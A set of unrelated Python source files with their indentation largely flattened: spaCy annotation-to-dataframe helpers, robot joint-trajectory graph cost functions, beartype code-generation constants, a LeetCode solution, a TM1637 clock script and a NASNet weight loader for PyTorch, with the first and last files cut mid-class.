def get_named_entity_dict(doc):
"""
To get named entities from NLP processed text
:param doc: spacy container for linguistic annotations.
:return: dictionary containing entity_text and entity_label
"""
entity_details_dict = {"ent_text": [], "ent_label": []}
for ent in doc.ents:
entity_details_dict["ent_text"].append(ent.text)
entity_details_dict["ent_label"].append(ent.label_)
return entity_details_dict
def to_dataframe(
self, doc, columns=None, separate_entity_dframe=False, custom_attributes=None
):
"""
Convert Linguistic annotations for text into pandas dataframe
:param doc: spacy container for linguistic annotations.
:param columns: list of str, name of columns to be included in dataframe (default:
["id", "text", "start", "end", "pos_", "tag_", "dep_", "head", "ent_type_"])
:param separate_entity_dframe: bool, for separate entity dataframe (default: False)
:param custom_attributes: list, for custom attribute
:return: dataframe, dataframe containing linguistic annotations
"""
if columns is None:
columns = utils.get_default_columns()
if "id" not in columns:
columns = ["id"] + columns
consistent_columns = utils.check_columns_consistency(columns)
if custom_attributes:
consistent_columns += [
(attr, "custom_attributes") for attr in custom_attributes
]
token_attribute_dictionary = self.get_token_attribute_dict(
doc, consistent_columns
)
tokens_dataframe = pd.DataFrame.from_dict(token_attribute_dictionary)
new_column_names_map = {i: "token_" + i for i in tokens_dataframe.columns}
tokens_dataframe.rename(columns=new_column_names_map, inplace=True)
        tokens_dataframe = tokens_dataframe.reindex(tokens_dataframe["token_id"])
tokens_dataframe.drop(columns=["token_id"], inplace=True)
if not doc.ents and "token_ent_type_" in tokens_dataframe.columns:
tokens_dataframe.drop(columns=["token_ent_type_"], inplace=True)
if separate_entity_dframe:
entity_dict = self.get_named_entity_dict(doc)
entity_dataframe = pd.DataFrame.from_dict(entity_dict)
return (
tokens_dataframe
if not separate_entity_dframe
else (tokens_dataframe, entity_dataframe)
)
def add_entity_ruler(self, patterns):
"""
To add entity ruler in nlp pipeline
official doc: https://spacy.io/api/entityruler
:param patterns: list or list of lists of token/phrase based patterns
"""
ruler = self._nlp.add_pipe("entity_ruler")
ruler.add_patterns(patterns)
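if __name__ == "__main__":
    # Minimal usage sketch, not part of the original module; assumes the
    # small English model is installed (python -m spacy download en_core_web_sm).
    import spacy
    dframcy = DframCy(spacy.load("en_core_web_sm"))
    doc = dframcy.nlp("Apple is looking at buying U.K. startup for $1 billion")
    print(dframcy.to_dataframe(doc).head())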
|
from collections import namedtuple
from typing import List, Tuple, Optional
import numpy as np
from dijkstar import Graph
from src.kinematics.forward_kinematics import geometric_jacobian
from src.kinematics.joints import BaseJoint
from src.prechecks.trajectory_segment import JointTrajSegment
START_NODE = -1
STOP_NODE = -2
NodeInfo = namedtuple('NodeInfo', 'conf joints seg_idx t')
def joint_limit_cost(joints: List[float], qlim: List[float], w: Optional[List[float]] = None) -> float:
"""
Measure to drive joints away from their limits.
:param joints: Joint coordinates to be evaluated
:param qlim: Joint limits in order [J1 min, J1 max, J2 min, J2 max, Jn min, Jn max]
:param w: Weights for the individual joints.
:return: Non-negative cost value for the given joint coordinates. Best is zero.
[1] B. Siciliano, L. Sciavicco, L. Villani und G. Oriolo, Robotics : Modelling, Planning and Control, London:
Springer, 2009.
"""
val = 0
if w is None:
for jmin, jmax, j in zip(qlim[::2], qlim[1::2], joints):
# Use distance from mid-point relative to total range
val += ((j - 0.5 * (jmin + jmax)) / (jmax - jmin)) ** 2
else:
if len(w) != len(joints):
raise ValueError('Need to supply as many weight factors as joint coordinates.')
for jmin, jmax, j, jw in zip(qlim[::2], qlim[1::2], joints, w):
val += jw * ((j - 0.5 * (jmin + jmax)) / (jmax - jmin)) ** 2
# Normalize with regard to number of joints
return val / (2 * len(joints))
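# Example: with qlim = [-1, 1, -2, 2] every joint of joints = [0, 0] sits at
# its mid-range, so joint_limit_cost([0, 0], [-1, 1, -2, 2]) == 0.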
def joint_velocity_cost(prev_j: List[float], curr_j: List[float], qdlim: List[float], dt: float,
w: Optional[List[float]] = None) -> float:
"""
Measure to penalize large joint velocities.
:param prev_j: Joint coordinates of the previous node
:param curr_j: Joint coordinate of the current node
:param qdlim: Maximum joint velocities in order
:param dt: Time Delta between the points in seconds
:param w: Weights for the individual joints.
:return: Non-negative cost value for the given joint coordinates. Best is zero.
"""
if w is not None:
if len(w) != len(curr_j):
raise ValueError('Need to supply as many weight factors as joint coordinates.')
else:
w = [1] * len(curr_j)
val = 0
for jprev, jcurr, j_vel_max, jw in zip(prev_j, curr_j, qdlim, w):
velocity_ratio = (jcurr - jprev) / (dt * j_vel_max)
val += jw * velocity_ratio ** 2
# Normalize with regard to number of joints
return val / (2 * len(curr_j))
def singularity_proximity_cost(config: List[BaseJoint], curr_j: List[float]) -> float:
"""
Measure to penalize singularity proximity.
:param config: List of joints containing coordinate transformations.
:param curr_j: Joint coordinate of the current node
:return: Non-negative cost value for the given joint coordinates. Best is zero.
"""
    # Apply additional cost depending on proximity to singularities
jac = geometric_jacobian(config, curr_j)
    # Since J is square: det(J*JT) = det(J) * det(JT) = (det(J))^2 >= 0
    # sqrt((det(J))^2) = |(det(J))^2|
    det = abs(np.linalg.det(jac))
    if det == 0:
        # Singularity: NumPy float division returns inf with a warning
        # instead of raising ZeroDivisionError, so test explicitly.
        return float('Inf')
    return 1 / det
def calc_cost(curr: NodeInfo, prev: NodeInfo, qlim: List[float], qdlim: List[float], config: List[BaseJoint]) -> float:
"""
Calculate the edge cost between two nodes.
:param curr: Info about the current node
:param prev: Info about the previous node
:param qlim: Joint limits in order [J1 min, J1 max, J2 min, J2 max, Jn min, Jn max]
:param qdlim: Maximum joint velocities in order
:param config: List of joints containing coordinate transformations.
:return: Non-negative cost value for the given joint coordinates. Best is zero.
"""
if curr.seg_idx == prev.seg_idx:
if curr.conf != prev.conf:
# Currently, configuration changes within a segment are not allowed.
return float('Inf')
# Common configurations are fine
cost = joint_limit_cost(curr.joints, qlim)
# Proportional to joint delta
cost += joint_velocity_cost(prev.joints, curr.joints, qdlim, dt=curr.t - prev.t)
# Cost with regard to singularity proximity
cost += singularity_proximity_cost(config, curr.joints)
return cost
# Else
if curr.conf != prev.conf:
# Currently, configuration changes between segments are not allowed either (not worth it).
return float('Inf')
# return joint_limit_cost(curr.joints, qlim) + singularity_proximity_cost(config, curr.joints)
# Otherwise you can go as you like
return 0
def calc_node_idx(point_idx: int, configuration: int) -> int:
"""
Calculates a unique node index.
:param point_idx: Index of the point that the node belongs to within the trajectory.
:param configuration: Robot configuration for the node
:return: Integer value for the node index
"""
if 0 <= configuration <= 7:
if point_idx >= 0:
return 8 * point_idx + configuration
raise ValueError('Point index must be positive.')
raise ValueError('Only configurations from 0-7 are allowed.')
def calc_conf_from_node(node_idx, point_idx) -> int:
"""
Calculates the configuration from a node index
:param node_idx: Integer value for the node index
:param point_idx: Index of the point that the node belongs to within the trajectory.
:return: Integer value for the robot configuration of the node
"""
if point_idx >= 0:
return node_idx - 8 * point_idx
raise ValueError('Point index must be positive.')
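# Round-trip example: node indices pack (point index, configuration) as
# 8 * point_idx + configuration, so calc_node_idx(3, 5) == 29 and
# calc_conf_from_node(29, 3) == 5.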
def create_graph(joint_traj: List[JointTrajSegment], qlim: List[float], qdlim: List[float], config: List[BaseJoint]) \
-> Tuple[Graph, int, int]:
"""
Constructs a graph for a given joint trajectory.
The graph is unidirectional and has one common start and one common end node.
The graph consists of n layers with n being the total count of points in the joint trajectory.
The nodes within a layer are not connected but the nodes of adjacent layers are all connected initially.
For each point a node is created for each viable robot configuration/joint solution.
:param joint_traj: List of JointTrajectorySegments
:param qlim: Joint limits in order [J1 min, J1 max, J2 min, J2 max, Jn min, Jn max]
:param qdlim: Maximum joint velocities in order
:param config: List of joints containing coordinate transformations.
:return: Graph that can be used to determine shortest paths, start node, stop node.
"""
joint_network = Graph()
current_parents = {}
prev_seg_idx = 0
total_point_count = sum((len(segment.solutions) for segment in joint_traj))
point_idx = 0
# Iterate over all segments
for seg_idx, joint_segment in enumerate(joint_traj):
# Reset the time
t_prev_point = 0
# Iterate over points in task space and corresponding points in time per segment
for ik_solutions_point, t_curr_point in zip(joint_segment.solutions, joint_segment.time_points):
# Iterate over all nodes of the current point
for curr_conf, curr_j in ik_solutions_point.items():
node_idx = calc_node_idx(point_idx, curr_conf)
if point_idx == 0:
# First point nodes are all connected to start node (zero cost) and do not have distinct parent
# nodes.
joint_network.add_edge(START_NODE, node_idx, edge=0)
else:
# Following point nodes are connected to all nodes of the previous point
for prev_conf, prev_j in current_parents.items():
# Calculate the index of the previous node
previous_node_idx = calc_node_idx(point_idx - 1, prev_conf)
# Call a cost function to determine the transition cost between the nodes based on the robot
# configurations and the joint values.
curr_node_info = NodeInfo(conf=curr_conf, joints=curr_j, seg_idx=seg_idx, t=t_curr_point)
prev_node_info = NodeInfo(conf=prev_conf, joints=prev_j, seg_idx=prev_seg_idx, t=t_prev_point)
cost = calc_cost(curr_node_info, prev_node_info, qlim, qdlim, config)
# Add the edge to the graph
joint_network.add_edge(previous_node_idx, node_idx, edge=cost)
# Connect all last point nodes to a common last point (zero cost). This is useful to find the shortest path
# simply as path from START_NODE to STOP_NODE. The nodes are connected with zero cost.
if point_idx >= total_point_count - 1:
for curr_conf in ik_solutions_point.keys():
node_idx = calc_node_idx(point_idx, curr_conf)
joint_network.add_edge(node_idx, STOP_NODE, edge=0)
# Move forward to the next point and save the nodes of the current point as parents for the next point
current_parents = ik_solutions_point
t_prev_point = t_curr_point
point_idx += 1
# Move forward to the next segment
prev_seg_idx = seg_idx
    return joint_network, START_NODE, STOP_NODE
|
#!/usr/bin/env python3
# --------------------( LICENSE )--------------------
# Copyright (c) 2014-2022 Beartype authors.
# See "LICENSE" for further details.
'''
**Beartype decorator code generator magic** (i.e., global constants simplifying
code generation but *not* themselves code).
This private submodule is *not* intended for importation by downstream callers.
'''
# ....................{ IMPORTS }....................
from beartype._util.error.utilerror import EXCEPTION_PLACEHOLDER
# See the "beartype.cave" submodule for further commentary.
__all__ = ['STAR_IMPORTS_CONSIDERED_HARMFUL']
# ....................{ EXCEPTIONS }....................
EXCEPTION_PREFIX = EXCEPTION_PLACEHOLDER
'''
Human-readable substring unconditionally prefixing *all* exception messages
transitively across this subpackage, which the
:func:`beartype._util.error.utilerror.reraise_exception_placeholder` function
dynamically replaces with the name of both the currently decorated callable
*and* the currently iterated parameter or return of that callable.
Note that the :mod:`beartype._decor._code.codemain` submodule guarantees the
substring replacing this placeholder to be suffixed by a single space. Ergo, we
intentionally avoid doing so here.
'''
EXCEPTION_PREFIX_FUNC_WRAPPER_LOCAL = f'{EXCEPTION_PREFIX}wrapper parameter '
'''
Human-readable substring describing a new wrapper parameter required by the
current root type hint in exception messages.
'''
EXCEPTION_PREFIX_HINT = f'{EXCEPTION_PREFIX}type hint '
'''
Human-readable substring describing the current root type hint generically
(i.e., *without* respect to the specific PEP to which this hint conforms) in
exception messages.
'''
# ....................{ NAMES ~ parameter }....................
# To avoid colliding with the names of arbitrary caller-defined parameters, the
# beartype-specific parameter names *MUST* be prefixed by "__beartype_".
ARG_NAME_FUNC = '__beartype_func'
'''
Name of the **private decorated callable parameter** (i.e.,
:mod:`beartype`-specific parameter whose default value is the decorated
callable passed to all wrapper functions generated by the
:func:`beartype.beartype` decorator).
'''
ARG_NAME_GETRANDBITS = '__beartype_getrandbits'
'''
Name of the **private getrandbits parameter** (i.e., :mod:`beartype`-specific
parameter whose default value is the highly performant C-based
:func:`random.getrandbits` function conditionally passed to every wrapper
functions generated by the :func:`beartype.beartype` decorator internally
requiring one or more random integers).
'''
ARG_NAME_RAISE_EXCEPTION = '__beartype_raise_exception'
'''
Name of the **private exception raising parameter** (i.e.,
:mod:`beartype`-specific parameter whose default value is the
:func:`beartype._decor._error.errormain.raise_pep_call_exception`
function raising human-readable exceptions on call-time type-checking failures
passed to all wrapper functions generated by the :func:`beartype.beartype`
decorator).
'''
ARG_NAME_TYPISTRY = '__beartypistry'
'''
Name of the **private beartypistry parameter** (i.e., :mod:`beartype`-specific
parameter whose default value is the beartypistry singleton conditionally
passed to every wrapper function generated by the :func:`beartype.beartype`
decorator requiring one or more types or tuples of types cached by this
singleton).
'''
# ....................{ NAMES ~ locals }....................
VAR_NAME_PREFIX_PITH = '__beartype_pith_'
'''
Substring prefixing all local variables providing a **pith** (i.e., either the
current parameter or return value *or* item contained in the current parameter
or return value being type-checked by the current call).
'''
VAR_NAME_PITH_ROOT = f'{VAR_NAME_PREFIX_PITH}0'
'''
Name of the local variable providing the **root pith** (i.e., value of the
current parameter or return value being type-checked by the current call).
'''
VAR_NAME_ARGS_LEN = '__beartype_args_len'
'''
Name of the local variable providing the **positional argument count** (i.e.,
number of positional arguments passed to the current call).
'''
VAR_NAME_RANDOM_INT = '__beartype_random_int'
'''
Name of the local variable providing a **pseudo-random integer** (i.e.,
unsigned 32-bit integer pseudo-randomly generated for subsequent use in
type-checking randomly indexed container items by the current call).
'''
|
from typing import List
class Solution:
    def missingNumber(self, nums: List[int]) -> int:
        # use Gauss's formula: 0 + 1 + ... + n == n * (n + 1) // 2
        expected = len(nums) * (len(nums) + 1) // 2
        return expected - sum(nums)
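if __name__ == "__main__":
    # Quick check (illustrative): [3, 0, 1] covers 0..3 except 2.
    assert Solution().missingNumber([3, 0, 1]) == 2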
|
import time
import TM1637
import board
if __name__ == "__main__":
CLK = board.D6
DIO = board.D13
display = TM1637.TM1637(CLK, DIO)
display.hex(0xbeef)
time.sleep(5)
while True:
t = time.localtime()
display.numbers(t.tm_hour,t.tm_min)
time.sleep(60-(t.tm_sec%60))
|
import os
import h5py
import numpy as np
import torch
import torch.nn as nn
from torch.autograd import Variable
#from models.nasnet.debug import read_output
######################################################################
## Load parameters from HDF5 to Dict
######################################################################
#from models.util import save_model
def load_conv2d(state_dict, path, name_pth, name_tf):
h5f = h5py.File(path + '/' + name_tf + '.h5', 'r')
state_dict[name_pth + '.weight'] = torch.from_numpy(h5f['weight'][()]).permute(3, 2, 0, 1)
try:
state_dict[name_pth + '.bias'] = torch.from_numpy(h5f['bias'][()])
    except KeyError:
pass
h5f.close()
def load_linear(state_dict, path, name_pth, name_tf):
h5f = h5py.File(path + '/' + name_tf + '.h5', 'r')
state_dict[name_pth + '.weight'] = torch.from_numpy(h5f['weight'][()]).t()
try:
state_dict[name_pth + '.bias'] = torch.from_numpy(h5f['bias'][()])
    except KeyError:
pass
h5f.close()
def load_bn(state_dict, path, name_pth, name_tf):
h5f = h5py.File(path + '/' + name_tf + '.h5', 'r')
state_dict[name_pth + '.weight'] = torch.from_numpy(h5f['gamma'][()])
state_dict[name_pth + '.bias'] = torch.from_numpy(h5f['beta'][()])
state_dict[name_pth + '.running_mean'] = torch.from_numpy(h5f['mean'][()])
state_dict[name_pth + '.running_var'] = torch.from_numpy(h5f['var'][()])
h5f.close()
def load_separable_conv2d(state_dict, path, name_pth, name_tf):
h5f = h5py.File(path + '/' + name_tf + '.h5', 'r')
state_dict[name_pth + '.depthwise_conv2d.weight'] = torch.from_numpy(h5f['depthwise_weight'][()]).permute(2, 3, 0,
1)
try:
state_dict[name_pth + '.depthwise_conv2d.bias'] = torch.from_numpy(h5f['depthwise_bias'][()])
    except KeyError:
pass
state_dict[name_pth + '.pointwise_conv2d.weight'] = torch.from_numpy(h5f['pointwise_weight'][()]).permute(3, 2, 0,
1)
try:
state_dict[name_pth + '.pointwise_conv2d.bias'] = torch.from_numpy(h5f['pointwise_bias'][()])
    except KeyError:
pass
h5f.close()
def load_cell_branch(state_dict, path, name_pth, name_tf, branch, kernel_size):
load_separable_conv2d(state_dict, path, name_pth=name_pth + '_{branch}.separable_1'.format(branch=branch),
name_tf=name_tf + '/{branch}/separable_{ks}x{ks}_1'.format(branch=branch, ks=kernel_size))
load_bn(state_dict, path, name_pth=name_pth + '_{branch}.bn_sep_1'.format(branch=branch),
name_tf=name_tf + '/{branch}/bn_sep_{ks}x{ks}_1'.format(branch=branch, ks=kernel_size))
load_separable_conv2d(state_dict, path, name_pth=name_pth + '_{branch}.separable_2'.format(branch=branch),
name_tf=name_tf + '/{branch}/separable_{ks}x{ks}_2'.format(branch=branch, ks=kernel_size))
load_bn(state_dict, path, name_pth=name_pth + '_{branch}.bn_sep_2'.format(branch=branch),
name_tf=name_tf + '/{branch}/bn_sep_{ks}x{ks}_2'.format(branch=branch, ks=kernel_size))
def load_cell_stem_0(state_dict, path, name_pth='cell_stem_0', name_tf='cell_stem_0'):
# conv 1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_1x1.conv', name_tf=name_tf + '/1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_1x1.bn', name_tf=name_tf + '/beginning_bn')
# comb_iter_0
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='right', kernel_size=7)
# comb_iter_1
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='right', kernel_size=7)
# comb_iter_2
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_2', name_tf=name_tf + '/comb_iter_2',
branch='right', kernel_size=5)
# comb_iter_4
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_4', name_tf=name_tf + '/comb_iter_4',
branch='left', kernel_size=3)
def load_cell_stem_1(state_dict, path, name_pth='cell_stem_1', name_tf='cell_stem_1'):
# conv 1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_1x1.conv', name_tf=name_tf + '/1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_1x1.bn', name_tf=name_tf + '/beginning_bn')
load_conv2d(state_dict, path, name_pth=name_pth + '.path_1.conv', name_tf=name_tf + '/path1_conv')
load_conv2d(state_dict, path, name_pth=name_pth + '.path_2.conv', name_tf=name_tf + '/path2_conv')
load_bn(state_dict, path, name_pth=name_pth + '.final_path_bn', name_tf=name_tf + '/final_path_bn')
# comb_iter_0
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='right', kernel_size=7)
# comb_iter_1
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='right', kernel_size=7)
# comb_iter_2
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_2', name_tf=name_tf + '/comb_iter_2',
branch='right', kernel_size=5)
# comb_iter_4
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_4', name_tf=name_tf + '/comb_iter_4',
branch='left', kernel_size=3)
def load_first_cell(state_dict, path, name_pth, name_tf):
# conv 1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_1x1.conv', name_tf=name_tf + '/1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_1x1.bn', name_tf=name_tf + '/beginning_bn')
# other path
load_conv2d(state_dict, path, name_pth=name_pth + '.path_1.conv', name_tf=name_tf + '/path1_conv')
load_conv2d(state_dict, path, name_pth=name_pth + '.path_2.conv', name_tf=name_tf + '/path2_conv')
load_bn(state_dict, path, name_pth=name_pth + '.final_path_bn', name_tf=name_tf + '/final_path_bn')
# comb_iter_0
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='right', kernel_size=3)
# comb_iter_1
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='right', kernel_size=3)
# comb_iter_4
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_4', name_tf=name_tf + '/comb_iter_4',
branch='left', kernel_size=3)
def load_normal_cell(state_dict, path, name_pth, name_tf):
# conv 1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_1x1.conv', name_tf=name_tf + '/1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_1x1.bn', name_tf=name_tf + '/beginning_bn')
# conv prev_1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_prev_1x1.conv', name_tf=name_tf + '/prev_1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_prev_1x1.bn', name_tf=name_tf + '/prev_bn')
# comb_iter_0
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='right', kernel_size=3)
# comb_iter_1
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='right', kernel_size=3)
# comb_iter_4
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_4', name_tf=name_tf + '/comb_iter_4',
branch='left', kernel_size=3)
def load_reduction_cell(state_dict, path, name_pth, name_tf):
# conv 1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_1x1.conv', name_tf=name_tf + '/1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_1x1.bn', name_tf=name_tf + '/beginning_bn')
# conv prev_1x1
load_conv2d(state_dict, path, name_pth=name_pth + '.conv_prev_1x1.conv', name_tf=name_tf + '/prev_1x1')
load_bn(state_dict, path, name_pth=name_pth + '.conv_prev_1x1.bn', name_tf=name_tf + '/prev_bn')
# comb_iter_0
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='left', kernel_size=5)
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_0', name_tf=name_tf + '/comb_iter_0',
branch='right', kernel_size=7)
# comb_iter_1
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_1', name_tf=name_tf + '/comb_iter_1',
branch='right', kernel_size=7)
# comb_iter_2
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_2', name_tf=name_tf + '/comb_iter_2',
branch='right', kernel_size=5)
# comb_iter_4
load_cell_branch(state_dict, path, name_pth=name_pth + '.comb_iter_4', name_tf=name_tf + '/comb_iter_4',
branch='left', kernel_size=3)
def load(path):
state_dict = {}
# block1
load_conv2d(state_dict, path, name_pth='conv0.conv', name_tf='conv0')
load_bn(state_dict, path, name_pth='conv0.bn', name_tf='conv0_bn')
# cell_stem
load_cell_stem_0(state_dict, path, 'cell_stem_0', 'cell_stem_0')
load_cell_stem_1(state_dict, path, 'cell_stem_1', 'cell_stem_1')
load_first_cell(state_dict, path, 'cell_0', 'cell_0')
for i in range(1, 6):
load_normal_cell(state_dict, path, 'cell_' + str(i), 'cell_' + str(i))
load_reduction_cell(state_dict, path, 'reduction_cell_0', 'reduction_cell_0')
load_first_cell(state_dict, path, 'cell_6', 'cell_6')
for i in range(7, 12):
load_normal_cell(state_dict, path, 'cell_' + str(i), 'cell_' + str(i))
load_reduction_cell(state_dict, path, 'reduction_cell_1', 'reduction_cell_1')
load_first_cell(state_dict, path, 'cell_12', 'cell_12')
for i in range(13, 18):
load_normal_cell(state_dict, path, 'cell_' + str(i), 'cell_' + str(i))
load_linear(state_dict, path, 'linear', 'final_layer/FC')
return state_dict
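# Usage sketch (illustrative, not part of the original file): `path` must
# point at a directory of per-layer HDF5 files exported from the TensorFlow
# NASNet-A checkpoint, e.g.
#   state_dict = load('dump/nasnet')
#   model.load_state_dict(state_dict)
# where `model` is a matching PyTorch NASNet module.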
class MaxPoolPad(nn.Module):
def __init__(self):
super(MaxPoolPad, self).__init__()
self.pad = nn.ZeroPad2d((1, 0, 1, 0))
self.pool = nn.MaxPool2d(3, stride=2, padding=1)
def forward(self, x):
x = self.pad(x)
x = self.pool(x)
x = x[:, :, 1:, 1:]
return x
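# MaxPoolPad above (and AvgPoolPad below) emulate TensorFlow's 'SAME' pooling
# with stride 2: zero-pad one extra row/column at the top/left, pool, then
# drop the first output row/column so the output size matches TF's.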
class AvgPoolPad(nn.Module):
def __init__(self, stride=2, padding=1):
super(AvgPoolPad, self).__init__()
self.pad = nn.ZeroPad2d((1, 0, 1, 0))
self.pool = nn.AvgPool2d(3, stride=stride, padding=padding, count_include_pad=False)
def forward(self, x):
x = self.pad(x)
x = self.pool(x)
x = x[:, :, 1:, 1:]
return x
class SeparableConv2d(nn.Module):
def __init__(self, in_channels, out_channels, dw_kernel, dw_stride, dw_padding, bias=False):
super(SeparableConv2d, self).__init__()
self.depthwise_conv2d = nn.Conv2d(in_channels, in_channels, dw_kernel,
stride=dw_stride,
padding=dw_padding,
bias=bias,
groups=in_channels)
self.pointwise_conv2d = nn.Conv2d(in_channels, out_channels, 1, stride=1, bias=bias)
def forward(self, x):
x = self.depthwise_conv2d(x)
x = self.pointwise_conv2d(x)
return x
class BranchSeparables(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride, padding, bias=False):
super(BranchSeparables, self).__init__()
self.relu = nn.ReLU()
self.separable_1 = SeparableConv2d(in_channels, in_channels, kernel_size, stride, padding, bias=bias)
self.bn_sep_1 = nn.BatchNorm2d(in_channels, eps=0.001, momentum=0.1, affine=True)
self.relu1 = nn.ReLU()
self.separable_2 = SeparableConv2d(in_channels, out_channels, kernel_size, 1, padding, bias=bias)
self.bn_sep_2 = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.1, affine=True)
def forward(self, x):
x = self.relu(x)
x = self.separable_1(x)
x = self.bn_sep_1(x)
x = self.relu1(x)
x = self.separable_2(x)
x = self.bn_sep_2(x)
return x
class BranchSeparablesStem(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride, padding, bias=False):
super(BranchSeparablesStem, self).__init__()
self.relu = nn.ReLU()
self.separable_1 = SeparableConv2d(in_channels, out_channels, kernel_size, stride, padding, bias=bias)
self.bn_sep_1 = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.1, affine=True)
self.relu1 = nn.ReLU()
self.separable_2 = SeparableConv2d(out_channels, out_channels, kernel_size, 1, padding, bias=bias)
self.bn_sep_2 = nn.BatchNorm2d(out_channels, eps=0.001, momentum=0.1, affine=True)
def forward(self, x):
x = self.relu(x)
x = self.separable_1(x)
x = self.bn_sep_1(x)
x = self.relu1(x)
x = self.separable_2(x)
x = self.bn_sep_2(x)
return x
class BranchSeparablesReduction(BranchSeparables):
def __init__(self, in_channels, out_channels, kernel_size, stride, padding, z_padding=1, bias=False):
BranchSeparables.__init__(self, in_channels, out_channels, kernel_size, stride, padding, bias)
self.padding = nn.ZeroPad2d((z_padding, 0, z_padding, 0))
def forward(self, x):
x = self.relu(x)
x = self.padding(x)
x = self.separable_1(x)
x = x[:, :, 1:, 1:]
x = self.bn_sep_1(x)
x = self.relu1(x)
x = self.separable_2(x)
x = self.bn_sep_2(x)
return x
class CellStem0(nn.Module):
def __init__(self):
super(CellStem0, self).__init__()
self.conv_1x1 = nn.Sequential()
self.conv_1x1.add_module('relu', nn.ReLU())
self.conv_1x1.add_module('conv', nn.Conv2d(96, 42, 1, stride=1, bias=False))
self.conv_1x1.add_module('bn', nn.BatchNorm2d(42, eps=0.001, momentum=0.1, affine=True))
self.comb_iter_0_left = BranchSeparables(42, 42, 5, 2, 2)
self.comb_iter_0_right = BranchSeparablesStem(96, 42, 7, 2, 3, bias=False)
self.comb_iter_1_left = nn.MaxPool2d(3, stride=2, padding=1)
self.comb_iter_1_right = BranchSeparablesStem(96, 42, 7, 2, 3, bias=False)
self.comb_iter_2_left = nn.AvgPool2d(3, stride=2, padding=1, count_include_pad=False)
self.comb_iter_2_right = BranchSeparablesStem(96, 42, 5, 2, 2, bias=False)
self.comb_iter_3_right = nn.AvgPool2d(3, stride=1, padding=1, count_include_pad=False)
self.comb_iter_4_left = BranchSeparables(42, 42, 3, 1, 1, bias=False)
self.comb_iter_4_right = nn.MaxPool2d(3, stride=2, padding=1)
def forward(self, x):
x1 = self.conv_1x1(x)
x_comb_iter_0_left = self.comb_iter_0_left(x1)
x_comb_iter_0_right = self.comb_iter_0_right(x)
x_comb_iter_0 = x_comb_iter_0_left + x_comb_iter_0_right
x_comb_iter_1_left = self.comb_iter_1_left(x1)
x_comb_iter_1_right = self.comb_iter_1_right(x)
x_comb_iter_1 = x_comb_iter_1_left + x_comb_iter_1_right
x_comb_iter_2_left = self.comb_iter_2_left(x1)
x_comb_iter_2_right = self.comb_iter_2_right(x)
x_comb_iter_2 = x_comb_iter_2_left + x_comb_iter_2_right
x_comb_iter_3_right = self.comb_iter_3_right(x_comb_iter_0)
x_comb_iter_3 = x_comb_iter_3_right + x_comb_iter_1
x_comb_iter_4_left = self.comb_iter_4_left(x_comb_iter_0)
x_comb_iter_4_right = self.comb_iter_4_right(x1)
x_comb_iter_4 = x_comb_iter_4_left + x_comb_iter_4_right
x_out = torch.cat([x_comb_iter_1, x_comb_iter_2, x_comb_iter_3, x_comb_iter_4], 1)
return x_out
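# CellStem0 halves the spatial resolution and concatenates four 42-channel
# branches, so its output has 4 * 42 = 168 channels, which is the input width
# that CellStem1's conv_1x1 (168 -> 84) expects.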
class CellStem1(nn.Module):
def __init__(self):
super(CellStem1, self).__init__()
self.conv_1x1 = nn.Sequential()
self.conv_1x1.add_module('relu', nn.ReLU())
self.conv_1x1.add_module('conv', nn.Conv2d(168, 84, 1, stride=1, bias=False))
